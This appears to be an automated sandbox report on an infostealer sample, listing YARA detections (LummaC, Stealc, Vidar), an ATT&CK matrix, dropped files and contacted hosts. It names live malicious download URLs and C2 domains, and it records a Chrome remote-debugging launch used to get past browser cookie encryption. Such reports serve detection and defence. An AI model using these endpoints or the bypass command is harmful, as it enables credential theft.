Source: Yara match	File source: Process Memory Space: 0d287ea527.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c4df60870c.exe PID: 3688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0d287ea527.exe PID: 7244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 5664, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected Credential Flusher

Source: Yara match	File source: 00000023.00000002.2968432437.0000000001588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2f0cb7128a.exe PID: 8184, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0d287ea527.exe PID: 7788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0d287ea527.exe PID: 7244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 5664, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 10.2.c4df60870c.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.c4df60870c.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.0d287ea527.exe.6160000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.2593195591.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2974865414.000000000110E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2958992788.0000000000171000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2752270526.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3009795349.0000000006161000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2959179677.0000000000171000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: c4df60870c.exe PID: 3688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0d287ea527.exe PID: 7244, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: c4df60870c.exe PID: 3688, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0096EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,		6_2_0096EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0096DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,		6_2_0096DF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	411 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	2 Bypass User Account Control	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	11 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	4 Obfuscated Files or Information	Security Account Manager	22 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	312 Process Injection	12 Software Packing	NTDS	246 System Information Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	2 Bypass User Account Control	Cached Domain Credentials	861 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Masquerading	Proc Filesystem	361 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	361 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	312 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	50%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	100%	Joe Sandbox ML
C:\ProgramData\chrome.dll	4%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freecam[1].exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	53%	ReversingLabs	Win32.Trojan.CredentialFlusher
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	53%	ReversingLabs	Win32.Trojan.CredentialFlusher
C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	50%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
http://185.215.113.16/gm	100%	Avira URL Cloud	phishing
https://youtube.comingZ	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpncoded3$	100%	Avira URL Cloud	malware
https://founpiuer.store/apii	100%	Avira URL Cloud	malware
https://founpiuer.store/es#g	100%	Avira URL Cloud	malware
moutheventushz.shop	100%	Avira URL Cloud	malware
https://worddosofrm.shop:443/api	100%	Avira URL Cloud	malware
standartedby.shop	100%	Avira URL Cloud	malware
https://worddosofrm.shop/api8&=c	100%	Avira URL Cloud	malware
https://founpiuer.store:443/api5Cs	100%	Avira URL Cloud	malware
https://screenshots.firefox.com/bound	0%	Avira URL Cloud	safe
https://worddosofrm.shop/CoN	100%	Avira URL Cloud	malware
bakedstusteeb.shop	100%	Avira URL Cloud	malware
http://beego.me/docs/advantage/monitor.md	0%	Avira URL Cloud	safe
http://185.215.113.16/steam/random.exe.	100%	Avira URL Cloud	malware
http://185.215.113.16/mine/random.exeE=	100%	Avira URL Cloud	phishing
respectabosiz.shop	100%	Avira URL Cloud	malware
http://185.215.113.16/1ld-	100%	Avira URL Cloud	phishing
conceszustyb.shop	100%	Avira URL Cloud	malware
https://account.bellmedia.caget	0%	Avira URL Cloud	safe
https://worddosofrm.shop/k	100%	Avira URL Cloud	malware
https://worddosofrm.shop/h	100%	Avira URL Cloud	malware
https://worddosofrm.shop/Y	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
example.org	93.184.215.14	true	false	high
star-mini.c10r.facebook.com	157.240.252.35	true	false	high
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	high
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	high
twitter.com	104.244.42.65	true	false	high
s-part-0044.t-0009.fb-t-msedge.net	13.107.253.72	true	false	high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
s-part-0039.t-0009.t-msedge.net	13.107.246.67	true	false	high
dyna.wikimedia.org	185.15.59.224	true	false	high
worddosofrm.shop	104.21.16.142	true	true	unknown
prod.remote-settings.prod.webservices.mozgcp.net	34.149.100.209	true	false	high
contile.services.mozilla.com	34.117.188.166	true	false	high
youtube.com	142.250.185.238	true	false	high
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false	high
youtube-ui.l.google.com	142.250.186.110	true	false	high
founpiuer.store	104.21.5.155	true	false	high
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false	high
reddit.map.fastly.net	151.101.1.140	true	false	high
ipv4only.arpa	192.0.0.171	true	false	high
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false	high
push.services.mozilla.com	34.107.243.93	true	false	high
www.google.com	142.250.186.100	true	false	high
telemetry-incoming.r53-2.services.mozilla.com	34.120.208.123	true	false	high
js.monitor.azure.com	unknown	unknown	false	high
www.reddit.com	unknown	unknown	false	high
spocs.getpocket.com	unknown	unknown	false	high
mdec.nelreports.net	unknown	unknown	false	high
content-signature-2.cdn.mozilla.net	unknown	unknown	false	high
presticitpo.store	unknown	unknown	false	high
support.mozilla.org	unknown	unknown	false	high
firefox.settings.services.mozilla.com	unknown	unknown	false	high
necklacedmny.store	unknown	unknown	false	high
www.youtube.com	unknown	unknown	false	high
fadehairucw.store	unknown	unknown	false	high
www.facebook.com	unknown	unknown	false	high
detectportal.firefox.com	unknown	unknown	false	high
thumbystriw.store	unknown	unknown	false	high
shavar.services.mozilla.com	unknown	unknown	false	high
crisiwarny.store	unknown	unknown	false	high
www.wikipedia.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/	false		high
moutheventushz.shop	true	Avira URL Cloud: malware	unknown
standartedby.shop	true	Avira URL Cloud: malware	unknown
http://185.215.113.206/746f34465cf17784/freebl3.dll	false		high
http://185.215.113.206/746f34465cf17784/mozglue.dll	false		high
bakedstusteeb.shop	true	Avira URL Cloud: malware	unknown
respectabosiz.shop	true	Avira URL Cloud: malware	unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
conceszustyb.shop	true	Avira URL Cloud: malware	unknown
http://185.215.113.206/746f34465cf17784/sqlite3.dll	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://merino.services.mozilla.com/api/v1/suggestresource://activity-stream/lib/DefaultSites.sys.mj	firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/learning/access-management/phishing-attack/	0d287ea527.exe, 00000009.00000003.2544686879.000000000075C000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2705148436.0000000001153000.00000004.00000020.00020000.00000000.sdmp	false		high
https://founpiuer.store/apii	0d287ea527.exe, 00000009.00000003.2544718457.0000000000706000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://founpiuer.store:443/api5Cs	0d287ea527.exe, 00000012.00000002.2978043891.00000000010E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/gm	0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records	firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://merino.services.mozilla.com/api/v1/suggest	firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/spocs	firefox.exe, 0000001A.00000002.2909177907.0000028C9E9AE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://worddosofrm.shop/api8&=c	BitLockerToGo.exe, 00000015.00000003.2927336825.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2921888267.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://screenshots.firefox.com	firefox.exe, 0000001A.00000002.2846282370.0000028C96AF5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 0000001A.00000002.2884703213.0000028C9CD06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD0C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://xhr.spec.whatwg.org/#sync-warning	firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 0000001A.00000002.2849549835.0000028C97326000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2715980139.0000028C9AE5A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://profiler.firefox.com/	firefox.exe, 0000001A.00000002.2863474387.0000028C99257000.00000004.00000800.00020000.00000000.sdmp	false		high
https://worddosofrm.shop:443/api	BitLockerToGo.exe, 00000015.00000003.2896788902.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mozilla-services/screenshots	firefox.exe, 0000001A.00000003.2714052213.0000028C9AE3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2860413148.0000028C988E0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2713884695.0000028C9AE1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2715980139.0000028C9AE5A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tracking-protection-issues.herokuapp.com/new	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://founpiuer.store/es#g	0d287ea527.exe, 00000009.00000003.2638093147.0000000000768000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16:80/steam/random.exe	0d287ea527.exe, 00000012.00000002.2978043891.00000000010E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://ok.ru/	firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc	firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://exslt.org/dates-and-times	firefox.exe, 0000001A.00000002.2845203762.0000028C96961000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	c4df60870c.exe, 0000000A.00000002.3014279313.0000000023871000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2789702057.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2855995666.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2815618806.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2831854359.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2814519497.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2865305089.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2920445413.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://win.mail.ru/cgi-bin/sentmsg?mailto=%s	firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	c4df60870c.exe, 0000000A.00000002.2959179677.0000000000256000.00000040.00000001.01000000.0000000B.sdmp	false		high
https://youtube.comingZ	firefox.exe, 0000001A.00000002.2934782130.00002F7FAD103000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	0d287ea527.exe, 00000009.00000003.2565798441.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565425414.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565653231.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2722580253.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723873605.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723631868.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2724193570.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	0d287ea527.exe, 00000009.00000003.2544686879.000000000075C000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2544718457.0000000000706000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2544883068.0000000000716000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2706092169.0000000001106000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2705148436.0000000001153000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2706721478.000000000110D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugzilla.mo	firefox.exe, 0000001A.00000002.2877364701.0000028C9B581000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mitmdetection.services.mozilla.com/	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://static.adsafeprotected.com/firefox-etp-js	firefox.exe, 0000001A.00000002.2884703213.0000028C9CD0C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exe	0d287ea527.exe, 00000009.00000002.2925749591.0000000000706000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.2978043891.0000000001159000.00000004.00000020.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/	firefox.exe, 0000001A.00000002.2909177907.0000028C9E9AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/abuse/report/addon/	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpncoded3$	skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.iqiyi.com/	firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	c4df60870c.exe, 0000000A.00000002.2959179677.0000000000256000.00000040.00000001.01000000.0000000B.sdmp	false		high
https://monitor.firefox.com/user/breach-stats?includeResolved=true	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://screenshots.firefox.com/bound	firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=1584464	firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://worddosofrm.shop/CoN	BitLockerToGo.exe, 00000015.00000003.2816159407.0000000002AE2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://mail.google.com/mail/?extsrc=mailto&url=%shttps://mail.google.com/mail/?extsrc=mailto&url=%s	firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.rs/getrandom#nodejs-es-module-support	c4df60870c.exe, 0000000A.00000002.3027918391.000000006C331000.00000002.00000001.01000000.0000000F.sdmp, c4df60870c.exe, 0000000A.00000002.2959179677.000000000019C000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000003.2593195591.000000000504B000.00000004.00001000.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.3009795349.000000000618C000.00000040.00000800.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/userdiscoverystream.spoc.impressionspreffedRegionsBlockStringgetValue/pr	firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/about	firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	false		high
https://login.microsoftonline.com	firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://beego.me/docs/advantage/monitor.md	freecam.exe, 00000007.00000002.2669978281.0000000000968000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://www.zhihu.com/	firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	0d287ea527.exe, 00000009.00000003.2593713005.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2767455140.00000000058E3000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2766629692.0000000004FA2000.00000004.00000800.00020000.00000000.sdmp	false		high
